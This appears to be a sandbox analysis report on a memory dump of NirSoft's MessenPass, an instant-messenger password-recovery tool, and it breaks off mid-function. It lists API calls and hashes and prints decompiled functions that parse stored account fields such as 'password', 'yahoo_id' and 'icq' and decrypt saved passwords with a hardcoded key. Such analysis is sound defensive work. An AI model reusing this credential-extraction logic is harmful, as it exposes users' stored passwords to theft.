amp;, xrefs: 00412773
nbsp;, xrefs: 0041278F
brvbar;, xrefs: 004127E7
ouml;, xrefs: 00412B11
iuml;, xrefs: 00412ACE
THORN;, xrefs: 00412A17
Ocirc;, xrefs: 004129B3
Ccedil;, xrefs: 00412931
curren;, xrefs: 004127D3
oslash;, xrefs: 00412B1F
eth;, xrefs: 00412AD8
Agrave;, xrefs: 004128EB
raquo;, xrefs: 004128B9
Ouml;, xrefs: 004129C7
frac14;, xrefs: 004128C3
plusmn;, xrefs: 00412855
Oacute;, xrefs: 004129A9
oacute;, xrefs: 00412AF6
Ecirc;, xrefs: 0041294F
times;, xrefs: 004129D1
uml;, xrefs: 004127FB
pound;, xrefs: 004127C9
szlig;, xrefs: 00412A21
ordf;, xrefs: 0041280F
Ucirc;, xrefs: 004129F9
sup3;, xrefs: 00412869
iacute;, xrefs: 00412ABA
aacute;, xrefs: 00412A35
aelig;, xrefs: 00412A74
Euml;, xrefs: 00412959
ntilde;, xrefs: 00412AE2
frac12;, xrefs: 004128CD
ccedil;, xrefs: 00412A7E
acute;, xrefs: 00412873
auml;, xrefs: 00412A60
gt;, xrefs: 00412781
egrave;, xrefs: 00412A88
divide;, xrefs: 00412B18
reg;, xrefs: 00412837
not;, xrefs: 00412823
Otilde;, xrefs: 004129BD
Oslash;, xrefs: 004129DB
ugrave;, xrefs: 00412B26
thorn;, xrefs: 00412B49
macr;, xrefs: 00412841
Auml;, xrefs: 00412913
aring;, xrefs: 00412A6A
ograve;, xrefs: 00412AEC
copy;, xrefs: 00412805
AElig;, xrefs: 00412927
middot;, xrefs: 00412891
ucirc;, xrefs: 00412B34
ecirc;, xrefs: 00412A9C
Eacute;, xrefs: 00412945
Uacute;, xrefs: 004129EF
sup1;, xrefs: 004128A5
Aacute;, xrefs: 004128F5
yacute;, xrefs: 00412B42
ocirc;, xrefs: 00412B00
uuml;, xrefs: 00412B3B

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide_strncollatoimemcpystrlen
String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
API String ID: 1864335961-3210201812
Opcode ID: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
Instruction ID: 3bd07b0f0ec87f02ccef6cae80a33f2a43e47736a5c113f17b6628cc3434821e
Opcode Fuzzy Hash: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
Instruction Fuzzy Hash: 3BF125B1C042989EDF25CF94C9687DDBBB1AB05308F1481CAD8596B242D7B84ECACF5C

Uniqueness

Uniqueness Score: -1.00%

Function 004117B1, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 004117DE
GetDlgItem.USER32(?,000003E8), ref: 004117EA
GetWindowLongA.USER32(00000000,000000F0), ref: 004117F9
GetWindowLongA.USER32(?,000000F0), ref: 00411805
GetWindowLongA.USER32(00000000,000000EC), ref: 0041180E
GetWindowLongA.USER32(?,000000EC), ref: 0041181A
GetWindowRect.USER32(00000000,?), ref: 0041182C
GetWindowRect.USER32(?,?), ref: 00411837
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041184B
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411859
GetDC.USER32 ref: 00411892
strlen.MSVCRT ref: 004118D2
GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 004118E3
ReleaseDC.USER32(?,?), ref: 00411930
sprintf.MSVCRT ref: 004119F0
SetWindowTextA.USER32(?,?), ref: 00411A04
SetWindowTextA.USER32(?,00000000), ref: 00411A22
GetDlgItem.USER32(?,00000001), ref: 00411A58
GetWindowRect.USER32(00000000,?), ref: 00411A68
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411A76
GetClientRect.USER32(?,?), ref: 00411A8D
GetWindowRect.USER32(?,?), ref: 00411A97
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411ADD
GetClientRect.USER32(?,?), ref: 00411AE7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411B1F

Strings

STATIC, xrefs: 00411994
%s:, xrefs: 004119EA
EDIT, xrefs: 004119CB

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
String ID: %s:$EDIT$STATIC
API String ID: 1703216249-3046471546
Opcode ID: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
Instruction ID: b52727e0d403183305b875c614282f55299ec8bf2f46e0c3c56b37a88aeefe3f
Opcode Fuzzy Hash: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
Instruction Fuzzy Hash: B2B1DF72108341AFD711DF68C985AABBBE9FF88704F00492DFA9993261DB75E904CF16

Uniqueness

Uniqueness Score: -1.00%

Function 004105A6, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 213windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 004105EE
GetDlgItem.USER32(?,000003EA), ref: 00410606
SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00410625
SendMessageA.USER32(?,00000301,00000000,00000000), ref: 00410632
SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0041063B
memset.MSVCRT ref: 00410663
memset.MSVCRT ref: 00410683
memset.MSVCRT ref: 004106A1
memset.MSVCRT ref: 004106BA
memset.MSVCRT ref: 004106D8
memset.MSVCRT ref: 004106F1
GetCurrentProcess.KERNEL32 ref: 004106F9
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041071E
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00410754
memset.MSVCRT ref: 0041078F
GetCurrentProcessId.KERNEL32 ref: 0041079D
memcpy.MSVCRT ref: 004107CC
_mbscpy.MSVCRT ref: 004107EE
sprintf.MSVCRT ref: 00410859
SetDlgItemTextA.USER32(?,000003EA,?), ref: 00410872
GetDlgItem.USER32(?,000003EA), ref: 0041087C
SetFocus.USER32(00000000), ref: 00410883

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 00410853
{Unknown}, xrefs: 00410668

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
API String ID: 1428123949-3474136107
Opcode ID: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
Instruction ID: 62e2ad0b84330276400548424eb425e056568d51af16bfff45d60a010caf4195
Opcode Fuzzy Hash: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
Instruction Fuzzy Hash: 1D7108B2804248FFD721DF51EC45EDB7BACEF48344F04443EF54892160EA759A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4F6, Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 286
windowregistrystringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040B4F6(void* __ecx, void* __eflags) {
				void* __edi;
				void* __esi;
				struct HMENU__* _t115;
				struct HWND__* _t117;
				void* _t119;
				intOrPtr _t123;
				void* _t128;
				void* _t129;
				intOrPtr _t131;
				void* _t164;
				void* _t165;
				int _t170;
				void* _t171;
				void* _t172;
				void* _t176;
				void* _t185;
				void* _t195;
				void* _t196;
				intOrPtr _t198;
				intOrPtr _t199;
				void* _t200;
				intOrPtr* _t201;
				int _t203;
				intOrPtr* _t208;
				int* _t209;
				void* _t211;
				intOrPtr* _t212;
				void* _t214;

				_t214 = __eflags;
				_t209 = _t211 - 0x78;
				_t212 = _t211 - 0xa0;
				_t165 = __ecx;
				 *(_t209 - 0x28) =  *(_t209 - 0x28) & 0x00000000;
				 *(_t209 - 0x24) =  *(_t209 - 0x24) & 0x00000000;
				 *((char*)(_t209 - 0x20)) = 0;
				 *((char*)(_t209 - 0x1f)) = 1;
				 *((char*)(_t209 - 0x1e)) = 0;
				 *((char*)(_t209 - 0x1d)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t209 - 0x14)) = 6;
				 *((intOrPtr*)(_t209 - 0x10)) = 0x9c56;
				 *((char*)(_t209 - 0xc)) = 4;
				 *((char*)(_t209 - 0xb)) = 0;
				 *((char*)(_t209 - 0xa)) = 0;
				 *((char*)(_t209 - 9)) = 0;
				asm("stosd");
				asm("stosd");
				 *_t209 = 1;
				_t209[1] = 0x9c41;
				_t209[2] = 4;
				_t209[2] = 0;
				_t209[2] = 0;
				_t209[2] = 0;
				asm("stosd");
				asm("stosd");
				_t209[5] = 5;
				_t209[6] = 0x9c44;
				_t209[7] = 4;
				_t209[7] = 0;
				_t209[7] = 0;
				_t209[7] = 0;
				_t209[0x1b] = _t209[0x1b] | 0xffffffff;
				asm("stosd");
				asm("stosd");
				_t209[0xa] = 2;
				_t209[0xb] = 0x9c48;
				_t209[0xc] = 4;
				_t209[0xc] = 0;
				_t209[0xc] = 0;
				_t209[0xc] = 0;
				asm("stosd");
				asm("stosd");
				_t209[0xf] = 3;
				_t209[0x10] = 0x9c49;
				_t209[0x11] = 4;
				_t209[0x11] = 0;
				_t209[0x11] = 0;
				_t209[0x11] = 0;
				asm("stosd");
				asm("stosd");
				_t209[0x14] = 4;
				_t209[0x15] = 0x9c42;
				_t209[0x16] = 4;
				_t209[0x16] = 0;
				_t209[0x16] = 0;
				_t209[0x16] = 0;
				asm("stosd");
				_t196 = 0x66;
				asm("stosd");
				_t115 = E00408A29(_t196);
				 *(__ecx + 0x11c) = _t115;
				SetMenu( *(__ecx + 0x108), _t115);
				_t117 =  *0x41502c(0x50000000, 0x417c88,  *(_t165 + 0x108), 0x101, _t185, _t195, _t164);
				 *(_t165 + 0x114) = _t117;
				SendMessageA(_t117, 0x404, 1,  &(_t209[0x1b]));
				_t119 = LoadImageA( *0x41dbd4, 0x68, 0, 0, 0, 0x9060);
				 *((intOrPtr*)(_t165 + 0x118)) =  *0x415044( *(_t165 + 0x108), 0x50010900, 0x102, 7, 0, _t119, _t209 - 0x28, 7, 0x10, 0x10, 0x70, 0x10, 0x14);
				E00403CB2( *((intOrPtr*)(_t165 + 0x390)), _t214, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t165 + 0x108), 0x103,  *0x41dbd4, 0), 1);
				_t123 =  *((intOrPtr*)(_t165 + 0x390));
				_t170 =  *(_t123 + 0x1b0);
				_t198 =  *((intOrPtr*)(_t123 + 0x1b4));
				_t209[0x1c] =  *(_t123 + 0x184);
				if(_t170 <= 0) {
					L3:
					_t199 =  *((intOrPtr*)(_t165 + 0x390));
					E0040AC28(_t199);
					 *0x415040( *((intOrPtr*)(_t199 + 0x18c)), 0);
					_t128 = E00407017(0x6d);
					_t171 = 0xffffff;
					_t129 =  *0x41503c( *((intOrPtr*)(_t199 + 0x18c)), _t128);
					if( *((intOrPtr*)(_t199 + 0x1b8)) != 0) {
						E0040AB96(_t129, _t171, 0, _t199);
					}
					_t200 = 0x68;
					 *((intOrPtr*)(_t165 + 0x170)) = E00408A29(_t200);
					_t131 =  *((intOrPtr*)(_t165 + 0x398));
					if( *((intOrPtr*)(_t131 + 0x30)) <= 0) {
						_t172 = 0x417c88;
					} else {
						if( *((intOrPtr*)(_t131 + 0x1c)) <= 0) {
							_t172 = 0;
						} else {
							_t172 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xc)))) +  *((intOrPtr*)(_t131 + 0x10));
						}
					}
					0x413dce(_t172, "/noloadsettings");
					_t221 = _t131;
					if(_t131 == 0) {
						RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
					}
					_t201 = _t165 + 0x38c;
					E0040D725( *_t201, _t221);
					E0040BBF0(_t165, 0);
					 *( *_t201 + 0x724) = 1;
					SetFocus( *( *((intOrPtr*)(_t165 + 0x390)) + 0x184));
					if( *0x41e678 == 0) {
						E004069FA(0x41e678);
						if((GetFileAttributesA(0x41e678) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x41e678);
						}
					}
					_t203 = strlen(0x41e678);
					 *_t212 = 0x4185dc;
					_t94 = strlen(??) + 1; // 0x1
					_t224 = _t203 + _t94 - 0x104;
					if(_t203 + _t94 >= 0x104) {
						 *((char*)(_t165 + 0x180)) = 0;
					} else {
						E00406B4B(_t165 + 0x180, 0x41e678, "report.html");
					}
					_push(1);
					_t176 = 0x30;
					E0040AD6F( *((intOrPtr*)(_t165 + 0x390)), _t176);
					E0040B4DB(_t165);
					 *((intOrPtr*)(_t165 + 0x394)) = RegisterClipboardFormatA("commdlg_FindReplace");
					E0040AFE6(_t176, _t165, _t224, 0);
					if(E004077AF( *((intOrPtr*)(_t165 + 0x398)), ?str?, 3) >= 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x390)) + 0x1c8)) = E00406D5A(E0040779F(_t148,  *((intOrPtr*)(_t165 + 0x398))) + 3);
					}
					_t209[0x19] = 0x12c;
					_t209[0x1a] = 0x400;
					SendMessageA( *(_t165 + 0x114), 0x404, 2,  &(_t209[0x19]));
					return SendMessageA( *(_t165 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t208 = _t198 + 0xc;
					_t209[0x1d] = _t170;
					do {
						E00404E68( *((intOrPtr*)(_t208 + 4)),  *((intOrPtr*)(_t208 - 8)), _t209[0x1c],  *((intOrPtr*)(_t208 - 0xc)),  *((intOrPtr*)(_t208 - 4)),  *_t208);
						_t212 = _t212 + 0x10;
						_t208 = _t208 + 0x14;
						_t75 =  &(_t209[0x1d]);
						 *_t75 = _t209[0x1d] - 1;
					} while ( *_t75 != 0);
					goto L3;
				}
			}

0x0040b4f6
0x0040b4f7
0x0040b4fb
0x0040b504
0x0040b506
0x0040b50a
0x0040b50e
0x0040b512
0x0040b516
0x0040b51a
0x0040b523
0x0040b524
0x0040b525
0x0040b52c
0x0040b533
0x0040b537
0x0040b53b
0x0040b53f
0x0040b548
0x0040b549
0x0040b54a
0x0040b551
0x0040b558
0x0040b55c
0x0040b560
0x0040b564
0x0040b56d
0x0040b56e
0x0040b56f
0x0040b576
0x0040b57d
0x0040b581
0x0040b585
0x0040b589
0x0040b58f
0x0040b596
0x0040b597
0x0040b598
0x0040b59f
0x0040b5a6
0x0040b5aa
0x0040b5ae
0x0040b5b2
0x0040b5bb
0x0040b5bc
0x0040b5bd
0x0040b5c4
0x0040b5cb
0x0040b5cf
0x0040b5d3
0x0040b5d7
0x0040b5e0
0x0040b5e1
0x0040b5e2
0x0040b5e9
0x0040b5f0
0x0040b5f4
0x0040b5f8
0x0040b5fc
0x0040b605
0x0040b608
0x0040b609
0x0040b60a
0x0040b616
0x0040b61c
0x0040b637
0x0040b649
0x0040b64f
0x0040b667
0x0040b69e
0x0040b6d6
0x0040b6db
0x0040b6e1
0x0040b6e9
0x0040b6f5
0x0040b6f8
0x0040b721
0x0040b721
0x0040b729
0x0040b735
0x0040b742
0x0040b747
0x0040b74f
0x0040b75b
0x0040b75d
0x0040b75d
0x0040b764
0x0040b76a
0x0040b770
0x0040b779
0x0040b78e
0x0040b77b
0x0040b77e
0x0040b78a
0x0040b780
0x0040b785
0x0040b785
0x0040b77e
0x0040b799
0x0040b79e
0x0040b7a2
0x0040b7ae
0x0040b7ae
0x0040b7b4
0x0040b7bc
0x0040b7c4
0x0040b7cb
0x0040b7e1
0x0040b7f3
0x0040b7f5
0x0040b803
0x0040b80b
0x0040b80b
0x0040b803
0x0040b817
0x0040b819
0x0040b825
0x0040b829
0x0040b82f
0x0040b84a
0x0040b831
0x0040b841
0x0040b847
0x0040b857
0x0040b85b
0x0040b85c
0x0040b863
0x0040b876
0x0040b87c
0x0040b895
0x0040b8b2
0x0040b8b2
0x0040b8cf
0x0040b8d6
0x0040b8dd
0x0040b8f9
0x0040b6fa
0x0040b6fa
0x0040b6fd
0x0040b700
0x0040b711
0x0040b716
0x0040b719
0x0040b71c
0x0040b71c
0x0040b71c
0x00000000
0x0040b700

APIs

Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54

SetMenu.USER32(?,00000000), ref: 0040B61C
SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
_strcmpi.MSVCRT ref: 0040B799
RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
SetFocus.USER32(?), ref: 0040B7E1
GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
strlen.MSVCRT ref: 0040B812
strlen.MSVCRT ref: 0040B820
RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D

Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9

SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0

Strings

/noloadsettings, xrefs: 0040B793
Software\NirSoft\MessenPass, xrefs: 0040B7A4
commdlg_FindReplace, xrefs: 0040B868
/sm, xrefs: 0040B889
report.html, xrefs: 0040B819, 0040B831
SysListView32, xrefs: 0040B6C1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html
API String ID: 2862451953-3267067943
Opcode ID: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
Instruction ID: 58ee6bec69cc5a2ead352e1dc17fbc33d0493dc4f48ef93b1c15430ab04c662e
Opcode Fuzzy Hash: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
Instruction Fuzzy Hash: 4FC1F271500244EFEB129F64C84ABDA7FA5EF54708F04407EFA446F2D2CBB95944CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F689, Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 0040F94E: SetFilePointer.KERNEL32(0040F292,?,00000000,00000000,00418AF8,00000000,?,?,0040F8C4,?,00000000,?,747DF560), ref: 0040F968
Part of subcall function 0040F94E: memset.MSVCRT ref: 0040F973

_strcmpi.MSVCRT ref: 0040F729
_strcmpi.MSVCRT ref: 0040F740
_strcmpi.MSVCRT ref: 0040F757
_strcmpi.MSVCRT ref: 0040F76E
_strcmpi.MSVCRT ref: 0040F792
_strcmpi.MSVCRT ref: 0040F7A6
_strcmpi.MSVCRT ref: 0040F7BA
_strcmpi.MSVCRT ref: 0040F7CE
_strcmpi.MSVCRT ref: 0040F7E2
_mbscpy.MSVCRT ref: 0040F831
_strcmpi.MSVCRT ref: 0040F843
_mbscpy.MSVCRT ref: 0040F88E

Strings

password, xrefs: 0040F83D
yahoo_id, xrefs: 0040F7C8
icq, xrefs: 0040F723
e-mail, xrefs: 0040F7A0
UIN, xrefs: 0040F7DC
LoginName, xrefs: 0040F7B4
gg_1, xrefs: 0040F768
icq_1, xrefs: 0040F73A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi$_mbscpy$FilePointermemset
String ID: LoginName$UIN$e-mail$gg_1$icq$icq_1$password$yahoo_id
API String ID: 3770779768-1670397801
Opcode ID: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
Instruction ID: 0cc2e13a8e56b2c188e74045540a3fe2ab2ea4ed6cca8b10f1d7ecee0d286665
Opcode Fuzzy Hash: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
Instruction Fuzzy Hash: 795177725043096EEB21DAA2DC81EEA73AC9F04715F60447FF505E25C1EB38EB89879D

Uniqueness

Uniqueness Score: -1.00%

Function 0040244D, Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040244D(short* _a4, short* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				void _v60;
				intOrPtr _v64;
				char _v68;
				void _v1091;
				char _v1092;
				char _v2108;
				void _v2116;
				void* __edi;
				char _t82;
				void* _t89;
				short* _t90;
				void* _t92;
				intOrPtr _t102;
				short* _t103;
				void* _t104;
				intOrPtr* _t105;

				_v1092 = 0;
				memset( &_v1091, 0, 0x3ff);
				_t105 = _t104 + 0xc;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v1092, 0x400, 0, 0);
				_t82 = E004029D9( &_v1092,  &_v2116, 0x400);
				_t102 = _t82;
				_pop(_t92);
				if(_t102 > 8) {
					0x413d5c(0x48);
					_v68 = _t82;
					 *_t105 = 0x1000;
					0x413d5c();
					_v64 = _t82;
					_v60 = 0;
					_v59 = 0;
					_v58 = 0;
					_v57 = 0;
					_v56 = 0;
					_v55 = 0;
					_v54 = 0;
					_v53 = 0;
					_v52 = 0x99;
					_v51 = 0;
					_v50 = 0x86;
					_v49 = 0xa5;
					_v48 = 0x27;
					_v47 = 0xaa;
					_v46 = 0x9d;
					_v45 = 0x7f;
					_v44 = 0x58;
					_v43 = 0xaa;
					_v42 = 0xae;
					_v41 = 0xb9;
					_v40 = 0xb;
					_v39 = 0x47;
					_v38 = 0x3a;
					_v37 = 0x35;
					_v36 = 0xaa;
					_v35 = 0xe0;
					_v34 = 0xea;
					_v33 = 0x95;
					_v32 = 0x66;
					_v31 = 0xfb;
					_v30 = 0xe4;
					_v29 = 0x9f;
					_v28 = 0xcb;
					_v27 = 0xf7;
					_v26 = 0x16;
					_v25 = 0x1c;
					_v24 = 0xa3;
					_v23 = 0x92;
					_v22 = 0xe6;
					_v21 = 0x1c;
					_v20 = 0x96;
					_v19 = 6;
					_v18 = 0x9b;
					_v17 = 0x5b;
					_v16 = 0x29;
					_v15 = 0x30;
					_v14 = 0xbf;
					_v13 = 0xaf;
					_v12 = 0xec;
					_v11 = 0x11;
					_v10 = 0x29;
					_v9 = 0xc8;
					_v8 = 0x89;
					_v7 = 0x5b;
					_v6 = 0xb8;
					_v5 = 0x57;
					memcpy( &_v60,  &_v2116, 8);
					E00403632(_t92,  &_v68,  &_v60);
					_t70 = _t102 - 8; // -8
					_t88 = _t70;
					if(_t70 > 0x1fe) {
						_t88 = 0x1fe;
					}
					_t103 = _a4;
					_t89 = E0040373E(_t88, _t103,  &_v2108,  &_v68);
					 *((short*)(_t103 + 0x1fe)) = 0;
					0x413d56(_v68);
					0x413d56(_v64);
					return _t89;
				}
				_t90 = _a4;
				 *_t90 = 0;
				return _t90;
			}

0x00402468
0x0040246e
0x00402473
0x0040248c
0x0040249f
0x004024a4
0x004024a9
0x004024aa
0x004024b9
0x004024be
0x004024c1
0x004024c8
0x004024cd
0x004024dd
0x004024e0
0x004024e3
0x004024e6
0x004024e9
0x004024ec
0x004024ef
0x004024f2
0x004024f5
0x004024f9
0x004024fc
0x00402500
0x00402504
0x00402508
0x0040250c
0x00402510
0x00402514
0x00402518
0x0040251c
0x00402520
0x00402524
0x00402528
0x0040252c
0x00402530
0x00402534
0x00402538
0x0040253c
0x00402540
0x00402544
0x00402548
0x0040254c
0x00402550
0x00402554
0x00402558
0x0040255c
0x00402560
0x00402564
0x00402568
0x0040256c
0x00402570
0x00402574
0x00402578
0x0040257c
0x00402580
0x00402584
0x00402588
0x0040258c
0x00402590
0x00402594
0x00402598
0x0040259c
0x004025a0
0x004025a4
0x004025a8
0x004025ac
0x004025b0
0x004025b4
0x004025c3
0x004025c8
0x004025c8
0x004025d2
0x004025d4
0x004025d4
0x004025d6
0x004025e5
0x004025ed
0x004025f4
0x004025fc
0x00000000
0x00402602
0x004024ac
0x004024af
0x00000000

APIs

memset.MSVCRT ref: 0040246E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C

Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6

??2@YAPAXI@Z.MSVCRT ref: 004024B9
??2@YAPAXI@Z.MSVCRT ref: 004024C8
memcpy.MSVCRT ref: 004025B4
??3@YAXPAX@Z.MSVCRT ref: 004025F4
??3@YAXPAX@Z.MSVCRT ref: 004025FC

Strings

), xrefs: 0040259C
:, xrefs: 0040252C
0, xrefs: 00402588
[, xrefs: 004025A8
5, xrefs: 00402530
', xrefs: 00402504
f, xrefs: 00402544
G, xrefs: 00402528
W, xrefs: 004025B0
[, xrefs: 00402580
X, xrefs: 00402514
), xrefs: 00402584

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
String ID: '$)$)$0$5$:$G$W$X$[$[$f
API String ID: 3606715663-4187034442
Opcode ID: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
Instruction ID: d66295c9476db63dbc5c32b0f61e30ac1af87f583ef6fa4ed04bb8f7da70bc00
Opcode Fuzzy Hash: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
Instruction Fuzzy Hash: 98514C218087CEDDDB22D7BC98486DEBF745F26224F0843D9E1E47B2D2D265064AC77A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0A1, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 142
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040E0A1(intOrPtr* _a4, char* _a8) {
				char* _v8;
				void _v275;
				char _v276;
				void _v531;
				char _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				int _v796;
				int _v1052;
				void _v2075;
				char _v2076;
				void _v3099;
				int _v3100;
				void _v4123;
				int _v4124;
				void _v5147;
				char _v5148;
				void* __ebx;
				void* __edi;
				int _t50;
				char* _t54;
				int _t89;
				int* _t105;
				void* _t110;
				void* _t111;

				0x414060();
				_t89 = 0;
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_t50 = strlen(_a8);
				_t5 = strlen("accounts.ini") + 1; // 0x1
				_t111 = _t110 + 0x14;
				if(_t50 + _t5 >= 0x104) {
					_v276 = 0;
				} else {
					E00406B4B( &_v276, _a8, "accounts.ini");
				}
				_t54 = GetPrivateProfileIntA("Accounts", "num", _t89,  &_v276);
				_v8 = _t54;
				_a8 = _t89;
